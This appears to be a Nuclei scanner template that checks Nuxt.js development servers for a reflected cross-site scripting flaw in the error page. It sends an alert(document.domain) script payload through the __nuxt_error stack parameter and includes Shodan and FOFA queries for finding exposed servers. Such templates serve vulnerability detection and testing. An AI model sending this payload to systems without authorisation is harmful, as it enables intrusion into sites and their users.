id: nuxt-js-xss

info:
  name: Nuxt.js Error Page - Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: |
    The developer server unsafely renders the stack trace within errors. This can be manipulated by sending a specially crafted request.
  reference:
    - https://huntr.dev/bounties/70ac720d-c932-4ed3-98b1-dd2cbcb90185/
    - https://bryces.io/blog/nuxt3
    - https://twitter.com/fofabot/status/1669339995780558849
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"buildAssetsDir" "nuxt"
    fofa-query: body="buildAssetsDir" && body="__nuxt"
  tags: huntr,xss,nuxtjs

variables:
  payload: "<script>alert(document.domain)</script>"

http:
  - method: GET
    path:
      - "{{BaseURL}}/__nuxt_error?stack=%0A{{url_encode(payload)}}"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "{{payload}}"
          - "window.__NUXT__"
        condition: and

      - type: word
        part: header
        words:
          - "text/html"
# digest: 4b0a00483046022100e184ac245cc42774284e2fda8f4ffd559e46ffb273b587dfab98c576f73b92fa022100931427a4621c57da048aa4fdc2981b8ad64512cf8d4894e3dc3f1ce607d0b090:922c64590222798bb761d5b6d8e72950